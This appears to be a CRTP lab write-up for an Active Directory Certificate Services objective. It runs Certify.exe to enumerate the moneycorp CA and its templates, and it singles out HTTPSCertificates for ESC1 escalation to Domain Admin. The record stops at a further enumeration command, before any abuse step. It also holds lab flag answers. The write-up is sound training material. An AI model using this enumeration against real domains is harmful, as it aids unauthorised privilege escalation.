crtp-21

Learning Objective 21

Tasks

1 – Check if AD CS is used by the target forest and find any vulnerable/abusable templates

2 – Abuse any such template(s) to escalate to Domain Admin and Enterprise Admin

Flag 33 [dcorp-dc] – Name of the AD CS template that has ENROLLEE_SUPPLIES_SUBJECT 🚩

Flag 34 [dcorp-dc] – Name of the AD CS template that has EKU of Certificate Request Agent and grants enrollment rights to Domain Users 🚩

Flag 35 [dcorp-dc] – Name of the CA attribute that allows requestor to provide Subject Alternative Names 🚩

Flag 36 [dcorp-dc] – Name of the group that has enrollment rights on the CA-Integration template 🚩

Solutions

1 – Check if AD CS is used by the target forest and find any vulnerable/abusable templates

We can use the Certify tool to check for AD CS in moneycorp.

C:\AD\Tools\Certify.exe cas
C:\Users\student98>C:\AD\Tools\Certify.exe cas

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.1.0

[*] Action: Find certificate authorities
[*] Using the search base 'CN=Configuration,DC=moneycorp,DC=local'


[*] Root CAs

    Cert SubjectName              : CN=moneycorp-MCORP-DC-CA, DC=moneycorp, DC=local
    Cert Thumbprint               : 8DA9C3EF73450A29BEB2C77177A5B02D912F7EA8
    Cert Serial                   : 48D51C5ED50124AF43DB7A448BF68C49
    Cert Start Date               : 11/26/2022 1:59:16 AM
    Cert End Date                 : 11/26/2032 2:09:15 AM
    Cert Chain                    : CN=moneycorp-MCORP-DC-CA,DC=moneycorp,DC=local



[*] NTAuthCertificates - Certificates that enable authentication:

    Cert SubjectName              : CN=moneycorp-MCORP-DC-CA, DC=moneycorp, DC=local
    Cert Thumbprint               : 8DA9C3EF73450A29BEB2C77177A5B02D912F7EA8
    Cert Serial                   : 48D51C5ED50124AF43DB7A448BF68C49
    Cert Start Date               : 11/26/2022 1:59:16 AM
    Cert End Date                 : 11/26/2032 2:09:15 AM
    Cert Chain                    : CN=moneycorp-MCORP-DC-CA,DC=moneycorp,DC=local


[*] Enterprise/Enrollment CAs:

    Enterprise CA Name            : moneycorp-MCORP-DC-CA
    DNS Hostname                  : mcorp-dc.moneycorp.local
    FullName                      : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=moneycorp-MCORP-DC-CA, DC=moneycorp, DC=local
    Cert Thumbprint               : 8DA9C3EF73450A29BEB2C77177A5B02D912F7EA8
    Cert Serial                   : 48D51C5ED50124AF43DB7A448BF68C49
    Cert Start Date               : 11/26/2022 1:59:16 AM
    Cert End Date                 : 11/26/2032 2:09:15 AM
    Cert Chain                    : CN=moneycorp-MCORP-DC-CA,DC=moneycorp,DC=local
    [!] UserSpecifiedSAN : EDITF_ATTRIBUTESUBJECTALTNAME2 set, enrollees can specify Subject Alternative Names!
    CA Permissions                :
      Owner: BUILTIN\Administrators        S-1-5-32-544

      Access Rights                                     Principal

      Allow  Enroll                                     NT AUTHORITY\Authenticated UsersS-1-5-11
      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544
      Allow  ManageCA, ManageCertificates               mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
      Allow  ManageCA, ManageCertificates               mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
    Enrollment Agent Restrictions : None

    Enabled Certificate Templates:
        CA-Integration
        HTTPSCertificates
        SmartCardEnrollment-Agent
        SmartCardEnrollment-Users
        DirectoryEmailReplication
        DomainControllerAuthentication
        KerberosAuthentication
        EFSRecovery
        EFS
        DomainController
        WebServer
        Machine
        User
        SubCA
        Administrator





Certify completed in 00:00:32.5198115

C:\Users\student98>


We can list all the templates using the following command. Going through the output, we can find some interesting templates:

C:\AD\Tools\Certify.exe find
C:\Users\student98>c:\ad\tools\certify.exe find

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.1.0

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=moneycorp,DC=local'

[*] Listing info about the Enterprise CA 'moneycorp-MCORP-DC-CA'

    Enterprise CA Name            : moneycorp-MCORP-DC-CA
    DNS Hostname                  : mcorp-dc.moneycorp.local
    FullName                      : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=moneycorp-MCORP-DC-CA, DC=moneycorp, DC=local
    Cert Thumbprint               : 8DA9C3EF73450A29BEB2C77177A5B02D912F7EA8
    Cert Serial                   : 48D51C5ED50124AF43DB7A448BF68C49
    Cert Start Date               : 11/26/2022 1:59:16 AM
    Cert End Date                 : 11/26/2032 2:09:15 AM
    Cert Chain                    : CN=moneycorp-MCORP-DC-CA,DC=moneycorp,DC=local
    [!] UserSpecifiedSAN : EDITF_ATTRIBUTESUBJECTALTNAME2 set, enrollees can specify Subject Alternative Names!
    CA Permissions                :
      Owner: BUILTIN\Administrators        S-1-5-32-544

      Access Rights                                     Principal

      Allow  Enroll                                     NT AUTHORITY\Authenticated UsersS-1-5-11
      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544
      Allow  ManageCA, ManageCertificates               mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
      Allow  ManageCA, ManageCertificates               mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
    Enrollment Agent Restrictions : None

[*] Available Certificates Templates :

    CA Name                               : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
    Template Name                         : User
    Schema Version                        : 1
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Secure Email
    mspki-certificate-application-policy  : <null>
    Permissions
      Enrollment Permissions
        Enrollment Rights           : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Domain Users            S-1-5-21-335606122-960912869-3279953914-513
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
      Object Control Permissions
        Owner                       : mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteOwner Principals       : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteDacl Principals        : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteProperty Principals    : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519

    CA Name                               : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
    Template Name                         : EFS
    Schema Version                        : 1
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Encrypting File System
    mspki-certificate-application-policy  : <null>
    Permissions
      Enrollment Permissions
        Enrollment Rights           : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Domain Users            S-1-5-21-335606122-960912869-3279953914-513
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
      Object Control Permissions
        Owner                       : mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteOwner Principals       : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteDacl Principals        : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteProperty Principals    : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519

    CA Name                               : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
    Template Name                         : Administrator
    Schema Version                        : 1
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Microsoft Trust List Signing, Secure Email
    mspki-certificate-application-policy  : <null>
    Permissions
      Enrollment Permissions
        Enrollment Rights           : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
      Object Control Permissions
        Owner                       : mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteOwner Principals       : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteDacl Principals        : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteProperty Principals    : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519

    CA Name                               : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
    Template Name                         : EFSRecovery
    Schema Version                        : 1
    Validity Period                       : 5 years
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : File Recovery
    mspki-certificate-application-policy  : <null>
    Permissions
      Enrollment Permissions
        Enrollment Rights           : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
      Object Control Permissions
        Owner                       : mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteOwner Principals       : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteDacl Principals        : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteProperty Principals    : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519

    CA Name                               : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
    Template Name                         : Machine
    Schema Version                        : 1
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
    mspki-enrollment-flag                 : AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Server Authentication
    mspki-certificate-application-policy  : <null>
    Permissions
      Enrollment Permissions
        Enrollment Rights           : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Domain Computers        S-1-5-21-335606122-960912869-3279953914-515
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
      Object Control Permissions
        Owner                       : mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteOwner Principals       : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteDacl Principals        : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteProperty Principals    : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519

    CA Name                               : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
    Template Name                         : DomainController
    Schema Version                        : 1
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_DIRECTORY_GUID, SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Server Authentication
    mspki-certificate-application-policy  : <null>
    Permissions
      Enrollment Permissions
        Enrollment Rights           : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Domain Controllers      S-1-5-21-335606122-960912869-3279953914-516
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
                                      mcorp\Enterprise Read-only Domain ControllersS-1-5-21-335606122-960912869-3279953914-498
                                      NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
      Object Control Permissions
        Owner                       : mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteOwner Principals       : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteDacl Principals        : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteProperty Principals    : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519

    CA Name                               : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
    Template Name                         : WebServer
    Schema Version                        : 1
    Validity Period                       : 2 years
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : NONE
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Server Authentication
    mspki-certificate-application-policy  : <null>
    Permissions
      Enrollment Permissions
        Enrollment Rights           : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
      Object Control Permissions
        Owner                       : mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteOwner Principals       : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteDacl Principals        : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteProperty Principals    : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519

    CA Name                               : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
    Template Name                         : SubCA
    Schema Version                        : 1
    Validity Period                       : 5 years
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : NONE
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : <null>
    mspki-certificate-application-policy  : <null>
    Permissions
      Enrollment Permissions
        Enrollment Rights           : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
      Object Control Permissions
        Owner                       : mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteOwner Principals       : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteDacl Principals        : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteProperty Principals    : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519

    CA Name                               : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
    Template Name                         : DomainControllerAuthentication
    Schema Version                        : 2
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_DNS
    mspki-enrollment-flag                 : AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Server Authentication, Smart Card Logon
    mspki-certificate-application-policy  : Client Authentication, Server Authentication, Smart Card Logon
    Permissions
      Enrollment Permissions
        Enrollment Rights           : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Domain Controllers      S-1-5-21-335606122-960912869-3279953914-516
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
                                      mcorp\Enterprise Read-only Domain ControllersS-1-5-21-335606122-960912869-3279953914-498
                                      NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
      Object Control Permissions
        Owner                       : mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteOwner Principals       : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteDacl Principals        : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteProperty Principals    : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519

    CA Name                               : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
    Template Name                         : DirectoryEmailReplication
    Schema Version                        : 2
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_DIRECTORY_GUID, SUBJECT_ALT_REQUIRE_DNS
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Directory Service Email Replication
    mspki-certificate-application-policy  : Directory Service Email Replication
    Permissions
      Enrollment Permissions
        Enrollment Rights           : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Domain Controllers      S-1-5-21-335606122-960912869-3279953914-516
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
                                      mcorp\Enterprise Read-only Domain ControllersS-1-5-21-335606122-960912869-3279953914-498
                                      NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
      Object Control Permissions
        Owner                       : mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteOwner Principals       : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteDacl Principals        : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteProperty Principals    : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519

    CA Name                               : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
    Template Name                         : KerberosAuthentication
    Schema Version                        : 2
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_DOMAIN_DNS, SUBJECT_ALT_REQUIRE_DNS
    mspki-enrollment-flag                 : AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, KDC Authentication, Server Authentication, Smart Card Logon
    mspki-certificate-application-policy  : Client Authentication, KDC Authentication, Server Authentication, Smart Card Logon
    Permissions
      Enrollment Permissions
        Enrollment Rights           : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Domain Controllers      S-1-5-21-335606122-960912869-3279953914-516
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
                                      mcorp\Enterprise Read-only Domain ControllersS-1-5-21-335606122-960912869-3279953914-498
                                      NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERSS-1-5-9
      Object Control Permissions
        Owner                       : mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteOwner Principals       : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteDacl Principals        : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteProperty Principals    : mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519

    CA Name                               : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
    Template Name                         : SmartCardEnrollment-Agent
    Schema Version                        : 2
    Validity Period                       : 10 years
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
    mspki-enrollment-flag                 : AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Certificate Request Agent
    mspki-certificate-application-policy  : Certificate Request Agent
    Permissions
      Enrollment Permissions
        Enrollment Rights           : dcorp\Domain Users            S-1-5-21-719815819-3726368948-3917688648-513
                                      mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
      Object Control Permissions
        Owner                       : mcorp\Administrator           S-1-5-21-335606122-960912869-3279953914-500
        WriteOwner Principals       : mcorp\Administrator           S-1-5-21-335606122-960912869-3279953914-500
                                      mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteDacl Principals        : mcorp\Administrator           S-1-5-21-335606122-960912869-3279953914-500
                                      mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteProperty Principals    : mcorp\Administrator           S-1-5-21-335606122-960912869-3279953914-500
                                      mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519

    CA Name                               : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
    Template Name                         : SmartCardEnrollment-Users
    Schema Version                        : 2
    Validity Period                       : 10 years
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
    mspki-enrollment-flag                 : AUTO_ENROLLMENT
    Authorized Signatures Required        : 1
    Application Policies                  : Certificate Request Agent
    pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Secure Email
    mspki-certificate-application-policy  : Client Authentication, Encrypting File System, Secure Email
    Permissions
      Enrollment Permissions
        Enrollment Rights           : dcorp\Domain Users            S-1-5-21-719815819-3726368948-3917688648-513
                                      mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
      Object Control Permissions
        Owner                       : mcorp\Administrator           S-1-5-21-335606122-960912869-3279953914-500
        WriteOwner Principals       : mcorp\Administrator           S-1-5-21-335606122-960912869-3279953914-500
                                      mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteDacl Principals        : mcorp\Administrator           S-1-5-21-335606122-960912869-3279953914-500
                                      mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteProperty Principals    : mcorp\Administrator           S-1-5-21-335606122-960912869-3279953914-500
                                      mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519

    CA Name                               : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
    Template Name                         : HTTPSCertificates
    Schema Version                        : 2
    Validity Period                       : 10 years
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Secure Email
    mspki-certificate-application-policy  : Client Authentication, Encrypting File System, Secure Email
    Permissions
      Enrollment Permissions
        Enrollment Rights           : dcorp\RDPUsers                S-1-5-21-719815819-3726368948-3917688648-1123
                                      mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
      Object Control Permissions
        Owner                       : mcorp\Administrator           S-1-5-21-335606122-960912869-3279953914-500
        WriteOwner Principals       : mcorp\Administrator           S-1-5-21-335606122-960912869-3279953914-500
                                      mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteDacl Principals        : mcorp\Administrator           S-1-5-21-335606122-960912869-3279953914-500
                                      mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteProperty Principals    : mcorp\Administrator           S-1-5-21-335606122-960912869-3279953914-500
                                      mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519

    CA Name                               : mcorp-dc.moneycorp.local\moneycorp-MCORP-DC-CA
    Template Name                         : CA-Integration
    Schema Version                        : 2
    Validity Period                       : 1 year
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Secure Email
    mspki-certificate-application-policy  : Client Authentication, Encrypting File System, Secure Email
    Permissions
      Enrollment Permissions
        Enrollment Rights           : dcorp\RDPUsers                S-1-5-21-719815819-3726368948-3917688648-1123
                                      mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
      Object Control Permissions
        Owner                       : mcorp\Administrator           S-1-5-21-335606122-960912869-3279953914-500
        WriteOwner Principals       : mcorp\Administrator           S-1-5-21-335606122-960912869-3279953914-500
                                      mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteDacl Principals        : mcorp\Administrator           S-1-5-21-335606122-960912869-3279953914-500
                                      mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519
        WriteProperty Principals    : mcorp\Administrator           S-1-5-21-335606122-960912869-3279953914-500
                                      mcorp\Domain Admins           S-1-5-21-335606122-960912869-3279953914-512
                                      mcorp\Enterprise Admins       S-1-5-21-335606122-960912869-3279953914-519



Certify completed in 00:00:16.3671521

C:\Users\student98>


Privilege Escalation to DA and EA using ESC1

The template HTTPSCertificates looks interesting because it allows the requestor to supply the subject name. Let's get some more information about it:

C:\AD\Tools\Certify.exe find /enrolleeSuppliesSubject
C:\Users\student98>c:\ad\tools\certify.exe find /enrolleeSuppliesSubject

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
